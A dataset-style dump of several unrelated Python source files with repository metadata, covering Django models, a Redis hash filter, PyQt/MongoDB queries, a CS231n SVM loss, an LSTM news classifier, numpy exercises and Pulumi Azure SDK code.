objects = BlogManager()
class Book(models.Model):
title = models.CharField(max_length=255)
desc = models.TextField()
uploaded_by = models.ForeignKey(User , related_name="books_uploaded",on_delete=CASCADE)
users_who_like = models.ManyToManyField(User,related_name="liked_books" )
| [
"m.sweidan@hotmail.com"
] | m.sweidan@hotmail.com |
b3e93972753af0b81f60866b5810dda48c085e27 | d2f4aba8f2bae909267a7e19af30355277f51266 | /jd_spider/information_summary_filter/__init__.py | f294a8e80324feea507629ebdaaf6fbaa5b09bf9 | [] | no_license | msechen/jdpor | 24cb315a76bbd6c92d1f4bbc3100960aac328491 | af89f0d420b55648b244fcb64802beff783af28e | refs/heads/master | 2023-03-18T19:04:10.133701 | 2020-06-19T05:52:09 | 2020-06-19T05:52:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,684 | py | # 基于redis的存储
import hashlib
import six
class BaseFilter(object):
def __init__(self,
hash_func_name="md5",
redis_host='localhost',
redis_port=6379,
redis_db=0,
redis_key='boss',
):
self.redis_host = redis_host
self.redis_port = redis_port
self.redis_db = redis_db
self.redis_key = redis_key
self.hash_func = getattr(hashlib, hash_func_name) #md5压缩
self.storage = self._get_storage()
def _get_storage(self):
pass
def _safe_data(self, data):
if six.PY3:
if isinstance(data, bytes):
return data
elif isinstance(data, str):
return data.encode()
else:
raise Exception('请提供一个字符串')
else:
if isinstance(data, str):
return data
elif isinstance(data, unicode):
return data.encode()
else:
raise Exception('请提供一个字符串')
def _get_hash_value(self, data):
hash_obj = self.hash_func()
hash_obj.update(self._safe_data(data))
hash_value = hash_obj.hexdigest()
# print('MD5: ',hash_value)
return hash_value
def save(self, data):
hash_value = self._get_hash_value(data)
return self._save(hash_value)
def _save(self, hash_value):
pass
def is_exists(self, data):
hash_value = self._get_hash_value(data)
return self._is_exists(hash_value)
def _is_exists(self, hash_value):
pass
| [
"2521815745@qq.com"
] | 2521815745@qq.com |
25a56b9668be160cc2d3f1113f3f44564b46c9fe | 356151747d2a6c65429e48592385166ab48c334c | /backend/manager/threads/manage_chef/th_remove_chef_query.py | ea0d3f08d872c0edeeb0b8a88499869306d0296d | [] | no_license | therealrahulsahu/se_project | c82b2d9d467decd30a24388f66427c7805c23252 | c9f9fd5594191ab7dce0504ca0ab3025aa26a0c1 | refs/heads/master | 2020-06-25T02:51:30.355677 | 2020-04-20T13:01:36 | 2020-04-20T13:01:36 | 199,175,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,371 | py | from PyQt5.QtCore import QThread, pyqtSignal
class ThreadRemoveChefQuery(QThread):
signal = pyqtSignal('PyQt_PyObject')
def __init__(self, parent_class):
super().__init__()
self.output_list = []
self.parent_class = parent_class
def run(self):
in_name = r'(?i){}'.format(self.parent_class.curr_wid.le_rm_chef.text().strip())
self.output_list = []
self.output_itmes = []
from errors import ChefNotFoundError
from pymongo.errors import AutoReconnect
try:
myc = self.parent_class.MW.DB.chef
data_list = list(myc.find({'name': {'$regex': in_name}},
{'password': 0, 'phone': 0}).limit(10))
if data_list:
self.output_itmes = data_list
self.output_list = [x['_id'] for x in data_list]
self.parent_class.MW.mess('List Fetched')
self.signal.emit(True)
else:
self.parent_class.curr_wid.bt_rm_confirm.setEnabled(False)
raise ChefNotFoundError
except ChefNotFoundError as ob:
self.parent_class.MW.mess(str(ob))
except AutoReconnect:
self.parent_class.MW.mess('-->> Network Error <<--')
finally:
self.parent_class.curr_wid.bt_get_rm_chef.setEnabled(True)
| [
"43601158+therealrahulsahu@users.noreply.github.com"
] | 43601158+therealrahulsahu@users.noreply.github.com |
a8e8716ec163600523b8424e9c8d0f4011d3dd2d | 35db4ed134393a8ff06469f5155d4cc9c61d396f | /calculator.py | 1831e002968e61376bc50122a7d4b76df635544f | [] | no_license | kjrashmi20/python_class | 6e2595b40146e530de426019923352e9905b910f | 91b42aadd8f8e1aadb5abaf431fcabdb1cf489a5 | refs/heads/master | 2020-03-31T05:18:36.332992 | 2018-11-24T13:35:57 | 2018-11-24T13:35:57 | 151,941,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | while True:
print("1:Do you want to add two numbers ?")
print("2:Do you want to subtract two numbers?")
print("3:Do you want to multiply two numbers?")
print("4:Do you want to divide two numbers?")
print("5: Exit program")
a=int(input("Select option"))
if a==1:
add=int(input("Enter first number"))
add1=int(input("Enter second number"))
result=add+add1
print(result)
elif a==2:
sub=int(input("Enter first number"))
sub1=int(input("Enter second number"))
result=sub-sub1
print(result)
elif a==3:
mul = int(input("Enter first number"))
mul1 = int(input("Enter second number"))
result = mul*mul1
print(result)
elif a==4:
div = int(input("Enter first number"))
div1 = int(input("Enter second number"))
result = div/div1
print(result)
elif a==5:
print("Exiting the program, Thank you!")
break;
| [
"rashmikj1992@gmail.com"
] | rashmikj1992@gmail.com |
6c160a23807d2b6a1341c5701099e507cfeaf14e | 668f9da3e30d63cf4475cd922981def446551014 | /lesson_2/exercise_13/preprocess_inputs.py | 178b3f817437a3fe3019406f5f6e2a98ee8e23f8 | [] | no_license | melitus/intel_openvino | b14322aa6f8261ade55b8c1177152c7dd32f26ea | 7d64349c2110e4b364a49941a6f7d19401d21217 | refs/heads/master | 2020-12-13T20:07:18.363860 | 2020-02-14T15:46:27 | 2020-02-14T15:46:27 | 234,518,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,763 | py | import cv2
import numpy as np
#note: check the pre-trained model shape input, e.g / shape: [1x3x256x456] = [BxCxHxW]
#B - batch size, C - number of channels, H - image heightm W - image width
#syntax resize((Input_image, (width, height)) except for reshape() where you have to pass height first and then width one by one
#width has horizontal pixels and height has vertical pixels on screen. Just consider television screen horizontal (x-axis) pixels are larger in numbers then the vertical pixels (y-axis)
#https://docs.openvinotoolkit.org/latest/_models_intel_human_pose_estimation_0001_description_human_pose_estimation_0001.html
#before the width and height is a space which represent both the batch and the channel so
def preprocessing(input_image, height, width):
image = cv2.resize(input_image, (width, height))
image = image.transpose((2,0,1)) #2,0,1 is shuffle dimension to convert h*w*c to c*h*w. it brings the 2nd index to 0th index then 0th to 1st one and 1st to 2nd one.
image = image.reshape(1, 3, height, width)
return image
def pose_estimation(input_image):
'''
Given some input image, preprocess the image so that
it can be used with the related pose estimation model
you downloaded previously. You can use cv2.resize()
to resize the image.
'''
preprocessed_image = np.copy(input_image)
# TODO: Preprocess the image for the pose estimation model
preprocessed_image = preprocessing(preprocessed_image, 256, 456)
#preprocessed_image = preprocessingimage(preprocessed_image,(456,256)) # remember to put height and width in ()
return preprocessed_image
def text_detection(input_image):
'''
Given some input image, preprocess the image so that
it can be used with the related text detection model
you downloaded previously. You can use cv2.resize()
to resize the image.
'''
preprocessed_image = np.copy(input_image)
# TODO: Preprocess the image for the text detection model
preprocessed_image = preprocessing(preprocessed_image, 768, 1280)
#preprocessed_image = preprocessingimage(preprocessed_image,(1280,768)) # remember to put height and width in ()
return preprocessed_image
def car_meta(input_image):
'''
Given some input image, preprocess the image so that
it can be used with the related car metadata model
you downloaded previously. You can use cv2.resize()
to resize the image.
'''
preprocessed_image = np.copy(input_image)
# TODO: Preprocess the image for the car metadata model
preprocessed_image = preprocessing(preprocessed_image, 72, 72)
#preprocessed_image = preprocessingimage(preprocessed_image,(72,72)) # # remember to put height and width in ()
return preprocessed_image | [
"asmelitus@gmail.com"
] | asmelitus@gmail.com |
bd1648e753b21f488e833b19647f1e0cccd7604d | 15fa84d9f3250537dcda5117275bf56ec9ad99dd | /project/apps/core/migrations/0001_initial.py | bafc2d596978c660322f2beb83d8fac0ccfc97d9 | [] | no_license | danbeggan/contextualised-server | 4425f085b2602bc1fa30925d883190f82983e8a0 | 6f0811e00b672b4a6aa312e0d69ab5a8e6a1b923 | refs/heads/master | 2021-01-17T22:36:48.573581 | 2017-10-26T14:54:47 | 2017-10-26T14:54:47 | 84,200,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,382 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.12 on 2017-02-26 13:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Disambigauation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('synset', models.CharField(max_length=40)),
('definition', models.TextField()),
],
options={
'verbose_name': 'Disambigauation',
'verbose_name_plural': 'Disambigauations',
},
),
migrations.CreateModel(
name='Search',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('term', models.CharField(max_length=80)),
('paragraph', models.TextField()),
('disambigauation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Disambigauation')),
],
options={
'verbose_name': 'Search',
'verbose_name_plural': 'Searches',
},
),
]
| [
"danbeggan@gmail.com"
] | danbeggan@gmail.com |
221b36b5f091132763c293d1bd0373aa8ab7f2c8 | 7f80ea25908ce2eba6f6a72689f88c142319fe56 | /backtracking/baekjoon/2580.py | 6451fe1e80ba3457eba728de64bdc892abf909aa | [] | no_license | JUNGEEYOU/Algorithm-Problems | 1b242ae3aec3005d4e449f8b6170a63d1acac60b | 5e4a8a37254120c7c572b545d99006ebb512e151 | refs/heads/main | 2023-04-06T11:45:47.867171 | 2021-04-22T13:49:36 | 2021-04-22T13:49:36 | 353,240,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | import sys
zero_list = []
arr = []
for i in range(9):
x = list(map(int, sys.stdin.readline().split()))
zero_list.extend([(i, j) for j in range(len(x)) if x[j] == 0])
arr.append(x)
zero = len(zero_list)
result = []
def dfs():
if len(result) == zero:
return
# 나의 가로, 나의 세로, 나의 사각형이 모두 합이 45
flag_x = False
flag_y = False
for x, y in zero_list:
for i in arr[x]:
if i == 0:
flag_x = True
break
for i in range(9):
if arr[i][y] == 0:
flag_y = True
break
| [
"junge2u@naver.com"
] | junge2u@naver.com |
0a1105cc825c055ce865b8c5c5f61fe56a6ff4c9 | 1670cc30dbe1ee193889cbd1d4944cefb296b441 | /compareDataSet.py | 61d0ba62f9635e3f5c9a4345fc523029a54667f4 | [] | no_license | RaghavendraTA/TestingTool | 11dbca023a8271e9c941f6c398c570895d78afbe | ee2a9de483c5570bbcb4ddecea1d69cd7b7461d1 | refs/heads/master | 2020-12-03T01:56:18.932925 | 2019-06-25T13:16:13 | 2019-06-25T13:16:13 | 95,880,866 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,720 | py | import operator
class ExcelGenerator:
def push(self, alist, counter):
print(alist, end=' -> ')
def color(self, counter, cells):
print(cells)
def compareDataSet(leftData, rightData, ExcelCounter):
leftMap = {}
rightMap = {}
for item in leftData:
leftMap[item[1]] = item
for item in rightData:
rightMap[item[1]] = item
cells = list()
# Remove
additional_info = 2
exg = ExcelGenerator()
keys = set(leftMap.keys()).intersection(rightMap.keys())
for key in keys:
lefti = leftMap[key].copy()
righti = rightMap[key].copy()
j = 0
while len(lefti) > 0 and len(righti) > 0:
ls = lefti.pop(0)
rs = righti.pop(0)
if (ls != rs):
cells.append(j)
j += 1
cells += [i for i in range(j, j + len(lefti))]
cells += [i for i in range(j, j + len(righti))]
del lefti
del righti
if len(cells) > 0:
if additional_info == 0 or additional_info == 2:
exg.push(leftMap[key], ExcelCounter)
exg.color(ExcelCounter, cells)
ExcelCounter += 1
if additional_info == 1 or additional_info == 2:
exg.push(rightMap[key], ExcelCounter)
exg.color(ExcelCounter, cells)
ExcelCounter += 1
elif False: # Discrepancy radio button selected (discrepancy_with_fullrecord == 1)
if additional_info == 0 or additional_info == 2:
exg.push(leftMap[key], ExcelCounter)
ExcelCounter += 1
if additional_info == 1 or additional_info == 2:
exg.push(rightMap[key], ExcelCounter)
ExcelCounter += 1
del leftMap[key]
del rightMap[key]
cells.clear()
if additional_info == 0 or additional_info == 2:
for key in leftMap.keys():
cells += [j for j in range(len(leftMap[key]))]
exg.push(leftMap[key], ExcelCounter)
exg.color(ExcelCounter, cells)
ExcelCounter += 1
cells.clear()
if additional_info == 1 or additional_info == 2:
for key in rightMap.keys():
cells += [j for j in range(len(rightMap[key]))]
exg.push(rightMap[key], ExcelCounter)
exg.color(ExcelCounter, cells)
ExcelCounter += 1
cells.clear()
leftData = [
["ABC", 213, 431, 567],
["ABC", 132, 435],
["ABC", 123, 432],
["RAJI", 333, 999]
]
rightData = [
["ABC", 132, 437],
["PQR", 123, 432],
["XYZ", 213, 438],
["RAGHU", 111, 999]
]
compareDataSet(leftData, rightData, 0)
| [
"noreply@github.com"
] | noreply@github.com |
b00488bdbd576ad735be7916e04db39f869a3cf9 | 93032a4d62adf19260b8bf39ecee87c87e1c5b9c | /WEL/WEL-Random2.py | f39a797203124efb5ee033687d3648a6960f6f6b | [] | no_license | xiao666/DLMFSP | ecdfc8e6133852d62d1bfa76ad64307d5bf734bc | 68b86d6f19487c3a08f5eba06eaaeb869ad15690 | refs/heads/master | 2021-01-20T21:12:29.384697 | 2017-11-16T10:38:25 | 2017-11-16T10:38:25 | 101,756,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,898 | py | #text preprocessing:remove stopwords, puntuation, numbers
from nltk import word_tokenize
from nltk.corpus import stopwords
from string import punctuation
from sklearn.feature_extraction.text import CountVectorizer,HashingVectorizer
from keras.preprocessing.text import Tokenizer
from keras.preprocessing import sequence
from keras.utils import np_utils
import numpy as np
import os
import pandas as pd
from collections import Counter
from keras.layers.recurrent import LSTM
from keras.models import Sequential
from keras.layers import SpatialDropout1D
from keras.layers.core import Dense, Dropout, Activation, Lambda
from keras.layers.embeddings import Embedding
from sklearn.metrics import accuracy_score
from keras import optimizers
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
###LSTM###
#import data
data = pd.read_csv('Combined_News_DJIA.csv')
train = data[data['Date'] < '2015-01-01']
test = data[data['Date'] > '2014-12-31']
headlines=[[0 for x in range(25)] for y in range(len(data.index))]#len(data.index)
stopwords = set(stopwords.words('english'))#+list(punctuation)
print ("num of stop words:",len(stopwords))#
#print (stopwords)
for row in range(len(data.index)):#len(data.index)
for col in range(25):
temp0=str(data.iloc[row,(col+2)])
temp0=temp0.lower()
temp=HashingVectorizer().build_tokenizer()(temp0)
#=========code below remove stopwords==================
temp=[s for s in temp if s not in stopwords]
headlines[row][col]=temp
#example headlines:
#"b""Georgia 'downs two Russian warplanes' as countries move to brink of war"""
#b"The commander of a Navy air reconnaissance squadron that provides the President
#and the defense secretary the airborne ability to command the nation's nuclear weapons has been relieved of duty"
print ("data shape:",data.shape)
print ("list shape:",(len(headlines),len(headlines[0])))
print (headlines[0][0])
print (headlines[0][24])
merged_headlines=[]
for rows in range(len(headlines)):
temp1=[]
for cols in range(25):
temp1=temp1+headlines[rows][cols]
merged_headlines.append(' '.join(word for word in temp1))
print (len(merged_headlines),len(merged_headlines[0]),len(merged_headlines[1]))#num_days,length of N0.0 string, length of NO.1 string
#1989,2181,1526
print(merged_headlines[0])
merged_train=merged_headlines[0:1611]
merged_test=merged_headlines[1611:1989]
#basicvectorizer = CountVectorizer()
#basictrain = basicvectorizer.fit_transform(merged_train)
#print(basictrain.shape)
#print (basictrain[0][0])
#not removed:(1611,31675)
max_features = 30000 #size of vocabulary 10000
maxlen = 200 #max length of sequence
#cut texts after this number of words (among top max_features most common words)
batch_size = 32
nb_classes = 2
#embeddeing_dims = #dimensions of word vector
# vectorize the text samples into a 2D integer tensor
tokenizer = Tokenizer(num_words=max_features,filters='!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n0123456789')
tokenizer.fit_on_texts(merged_train)
print ("most occurence words:")
most_common_word=Counter(tokenizer.word_counts)
print (most_common_word.most_common(50))
sequences_train = tokenizer.texts_to_sequences(merged_train)
sequences_test = tokenizer.texts_to_sequences(merged_test)
#pad sequences to fixed length
print('Pad sequences (samples x time)')
X_train = sequence.pad_sequences(sequences_train, maxlen=maxlen)
print ("X_train.shape:",X_train.shape)
print ("X_train[0][0]:",X_train[0][0])
X_test = sequence.pad_sequences(sequences_test, maxlen=maxlen)
y_train = np.array(train["Label"])
y_test = np.array(test["Label"])
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
print('X_train shape:', X_train.shape)
print ("X_train[0]:",X_train[0])
print ("X_train[1]:",X_train[1])
print ("X_train[2]:",X_train[2])
print('X_test shape:', X_test.shape)
#LSTM model
print('Build model...')
model = Sequential()
print("0000000000000")
model.add(Embedding(max_features+1, 128))
model.add(SpatialDropout1D(0.2))
model.add(LSTM(128,dropout=0.2, recurrent_dropout=0.2))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))#softmax
model.summary()#print the model
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
#'binary_crossentropy''mean_squared_error' adam
print('Train...')
model.fit(X_train, Y_train, batch_size=batch_size, epochs=3,
validation_data=(X_test, Y_test))
score, acc = model.evaluate(X_test, Y_test,
batch_size=batch_size)
print('Test score:', score)
print('Test accuracy:', acc)
print("Generating test predictions...")
preds = model.predict_classes(X_test, verbose=0)
acc = accuracy_score(test['Label'], preds)
print('prediction accuracy: ', acc)
print ("percentage of rose:",sum(preds)/len(preds))
print ("end")
#os.system('pause') | [
"xjqxiaojianqing@vip.qq.com"
] | xjqxiaojianqing@vip.qq.com |
26126cfb3f6d2866be0b29241996ad92fe0eeee1 | e30db68eefc1c8b6f2eb7190b17ddb70b617913a | /square_num_test.py | 15ae69931d2daeaa84a3db32fa8a50f17e033035 | [] | no_license | rahulk9691/Stats_GA | 533e2f2c80f17fe4ff425db35830b42b03358620 | 6f2e051c5c2db1c7ce0e2cbe818c4657647ac953 | refs/heads/master | 2021-10-23T11:27:16.590285 | 2019-03-17T05:30:34 | 2019-03-17T05:30:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | def square_num(num):
return num*num
a = 10
print(square_num(5))
| [
"neosam.rahul@gmail.com"
] | neosam.rahul@gmail.com |
88bd95963c7c8bf981a85646dee3cbabf6b2601e | 69a7eba415d2c97f1d5667c37362994e8077ad53 | /numpy.py | c36b62283c6d48b9d1c4fc3971d4d9e7812c00e9 | [] | no_license | AyushAggarwal768/basic_python_programs | a03292d65314e1d914f4b4dbbadd36020de0dd13 | 279065419ed428f9b298706eec6820f863c659f1 | refs/heads/master | 2020-03-21T15:11:35.347075 | 2018-07-08T14:02:10 | 2018-07-08T14:02:10 | 138,698,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | #Q.1 - Create a numpy array A of shape(10,20) and B of shape (20,25) using np.random.
#Print the matrix which is the matrix multiplication of A and B.
#The shape of the new matrix should be (10,25). Using basic numpy math functions only find the sum of all the elements of the new matrix.
import numpy as np
a = np.random.rand(10,20)
b = np.random.rand(20,25)
c = (np.dot(a,b))
print(c)
print("Shape ->",c.shape)
print("Sum ->",np.sum(c))
#Q.2 - Create a numpy array A of shape(10,1).
#Using the basic operations of the numpy array generate an array of shape(10,1)
#such that each element is the following function applied on each element of A.
'''f(x)=1 / (1 + exp(-x))
Apply this function to each element of A and print the new array holding the value the function returns
Example:
a=[a1,a2,a3]
n(new array to be printed )=[ f(a1), f(a2), f(a3)]
'''
import numpy as np
import math
a = np.random.random((10,1))
print("Array:\n",a,"\n")
def fun(x):
return(1/(1+math.exp(-x)))
b = np.array((list(map(fun,a))))
print("After mapping:\n",b)
| [
"aggarwal768projects@gmail.com"
] | aggarwal768projects@gmail.com |
f908e937a19b718a4c2843454a515a8c29e473d4 | 78a5b5bbe96843027b7117b4d99cfecc959f3068 | /assignment1/cs231n/classifiers/linear_svm.py | 8bdfa5d633d01e31248d38793b884644f9b71d8e | [] | no_license | chengxiu2008/deep_learning | a306206cf14c74d8585024ddacee1d614c60a606 | 5f3ee03a3e04a8737d177c5d95ee3103b9fe92bf | refs/heads/master | 2020-03-17T11:44:12.914878 | 2018-07-25T17:13:01 | 2018-07-25T17:13:01 | 133,558,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,086 | py | import numpy as np
from random import shuffle
from past.builtins import xrange
def svm_loss_naive(W, X, y, reg):
"""
Structured SVM loss function, naive implementation (with loops).
Inputs have dimension D, there are C classes, and we operate on minibatches
of N examples.
Inputs:
- W: A numpy array of shape (D, C) containing weights.
- X: A numpy array of shape (N, D) containing a minibatch of data.
- y: A numpy array of shape (N,) containing training labels; y[i] = c means
that X[i] has label c, where 0 <= c < C.
- reg: (float) regularization strength
Returns a tuple of:
- loss as single float
- gradient with respect to weights W; an array of same shape as W
"""
dW = np.zeros(W.shape) # initialize the gradient as zero
# compute the loss and the gradient
num_classes = W.shape[1] #10
num_train = X.shape[0] #X_dev:500
loss = 0.0
for i in xrange(num_train):
scores = X[i].dot(W)
correct_class_score = scores[y[i]]
diff_count = 0
for j in xrange(num_classes):
if j == y[i]:
continue
margin = scores[j] - correct_class_score + 1 # note delta = 1
if margin > 0:
loss += margin
diff_count += 1
dW[:, j] += X[i]
dW[:, y[i]] -= diff_count*X[i]
# Right now the loss is a sum over all training examples, but we want it
# to be an average instead so we divide by num_train.
loss /= num_train
# Add regularization to the loss.
loss += 0.5 * reg * np.sum(W * W)
dW /= num_train
dW += reg*W # regularize the weights
#############################################################################
# TODO: #
# Compute the gradient of the loss function and store it dW. #
# Rather that first computing the loss and then computing the derivative, #
# it may be simpler to compute the derivative at the same time that the #
# loss is being computed. As a result you may need to modify some of the #
# code above to compute the gradient. #
#############################################################################
return loss, dW
def svm_loss_vectorized(W, X, y, reg):
"""
Structured SVM loss function, vectorized implementation.
Inputs and outputs are the same as svm_loss_naive.
"""
loss = 0.0
dW = np.zeros(W.shape) # initialize the gradient as zero
delta = 1.0
#############################################################################
# TODO: #
# Implement a vectorized version of the structured SVM loss, storing the #
# result in loss. #
#############################################################################
# print("W shape is ", W.shape) #(3073, 10)
# print("X shape is ", X.shape) #(500, 3073)
# print("y shape is ", y.shape) #(500,)
num_train = X.shape[0]
num_class = W.shape[1]
#calculate the score for each class
score = np.zeros((num_train, num_class)) #(500, 10)
score = X.dot(W)
# print("score shape = ", score.shape)
# print("num_train = ", num_train)
# print("y = ", y)
correct_score = score[np.arange(num_train), y] #get the yi scores for all data,(500,)
margin = np.maximum(0, (score - correct_score[:, np.newaxis] + delta))
margin[np.arange(num_train), y] = 0
margin_dw = np.maximum(0,margin)
margin_dw = margin_dw.transpose()
b = margin_dw > 0
margin_dw[b] = 1
m_true_class = np.sum(margin_dw, axis = 0)
margin_dw[y, np.arange(num_train)] = - m_true_class
dW = margin_dw.dot(X)
dW = dW.transpose()
loss = np.sum(margin)
loss /= num_train
loss += 0.5* reg * np.sum(W * W)
dW /= num_train
dW += reg*W
#############################################################################
# END OF YOUR CODE #
#############################################################################
#############################################################################
# TODO: #
# Implement a vectorized version of the gradient for the structured SVM #
# loss, storing the result in dW. #
# #
# Hint: Instead of computing the gradient from scratch, it may be easier #
# to reuse some of the intermediate values that you used to compute the #
# loss. #
#############################################################################
#############################################################################
# END OF YOUR CODE #
#############################################################################
return loss, dW
| [
"noreply@github.com"
] | noreply@github.com |
eeeed493d28fcc8c9819e0034e50ac7b62315780 | c3e39cfa32c749e1517d2e5be7cc95743daf0ffe | /PycharmProjects/Python Tutorial/PersonClass.py | e4faffe5f3ef9683ade51b60d2a6dc9989afdc59 | [] | no_license | priyasjoshi/Python | 940871bbe207f15315e25b9183d190a730f80d91 | c6a3ee2dbbb73b1e2f22ad3628dcc206dd1d1fc2 | refs/heads/master | 2022-11-04T04:27:16.439798 | 2019-06-21T05:50:05 | 2019-06-21T05:50:05 | 193,037,122 | 0 | 1 | null | 2022-10-31T06:53:27 | 2019-06-21T05:38:21 | Python | UTF-8 | Python | false | false | 848 | py | import datetime
class Person:
def __init__(self,name,birthdate):
self.name = name
self.birthdate = birthdate
self._age = None
self._age_last_calculated = None
self.recalculate_age()
def recalculate_age(self):
today = datetime.date.today()
age = today.year - self.birthdate.year
if today < datetime.date(today.year,self.birthdate.month,self.birthdate.day):
age -= 1
self.age = age
self.age_last_calculated = today
def age(self):
if(datetime.date.today() > self._age_last_calculated):
self.recalculate_age()
return self._age
def __str__(self):
return "string"
person = Person(
"Jane",
datetime.date(1990,7,26)
)
print(person.__str__())
print(person.name)
print(person.age) | [
"priyujoshi10@gmail.com"
] | priyujoshi10@gmail.com |
b8a648e695ffd41107411a2a06894c584e2e6f86 | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/securityinsights/v20210301preview/get_dynamics365_data_connector.py | aab4cce733e30b9d124ff6383db6269c8390a7b0 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 5,892 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetDynamics365DataConnectorResult',
'AwaitableGetDynamics365DataConnectorResult',
'get_dynamics365_data_connector',
]
@pulumi.output_type
class GetDynamics365DataConnectorResult:
"""
Represents Dynamics365 data connector.
"""
def __init__(__self__, data_types=None, etag=None, id=None, kind=None, name=None, system_data=None, tenant_id=None, type=None):
if data_types and not isinstance(data_types, dict):
raise TypeError("Expected argument 'data_types' to be a dict")
pulumi.set(__self__, "data_types", data_types)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if tenant_id and not isinstance(tenant_id, str):
raise TypeError("Expected argument 'tenant_id' to be a str")
pulumi.set(__self__, "tenant_id", tenant_id)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="dataTypes")
def data_types(self) -> 'outputs.Dynamics365DataConnectorDataTypesResponse':
"""
The available data types for the connector.
"""
return pulumi.get(self, "data_types")
@property
@pulumi.getter
def etag(self) -> Optional[str]:
"""
Etag of the azure resource
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> str:
"""
Azure resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> str:
"""
The kind of the data connector
Expected value is 'Dynamics365'.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> str:
"""
Azure resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
Azure Resource Manager metadata containing createdBy and modifiedBy information.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> str:
"""
The tenant id to connect to, and get the data from.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> str:
"""
Azure resource type
"""
return pulumi.get(self, "type")
class AwaitableGetDynamics365DataConnectorResult(GetDynamics365DataConnectorResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDynamics365DataConnectorResult(
data_types=self.data_types,
etag=self.etag,
id=self.id,
kind=self.kind,
name=self.name,
system_data=self.system_data,
tenant_id=self.tenant_id,
type=self.type)
def get_dynamics365_data_connector(data_connector_id: Optional[str] = None,
operational_insights_resource_provider: Optional[str] = None,
resource_group_name: Optional[str] = None,
workspace_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDynamics365DataConnectorResult:
"""
Represents Dynamics365 data connector.
:param str data_connector_id: Connector ID
:param str operational_insights_resource_provider: The namespace of workspaces resource provider- Microsoft.OperationalInsights.
:param str resource_group_name: The name of the resource group. The name is case insensitive.
:param str workspace_name: The name of the workspace.
"""
__args__ = dict()
__args__['dataConnectorId'] = data_connector_id
__args__['operationalInsightsResourceProvider'] = operational_insights_resource_provider
__args__['resourceGroupName'] = resource_group_name
__args__['workspaceName'] = workspace_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:securityinsights/v20210301preview:getDynamics365DataConnector', __args__, opts=opts, typ=GetDynamics365DataConnectorResult).value
return AwaitableGetDynamics365DataConnectorResult(
data_types=__ret__.data_types,
etag=__ret__.etag,
id=__ret__.id,
kind=__ret__.kind,
name=__ret__.name,
system_data=__ret__.system_data,
tenant_id=__ret__.tenant_id,
type=__ret__.type)
| [
"noreply@github.com"
] | noreply@github.com |
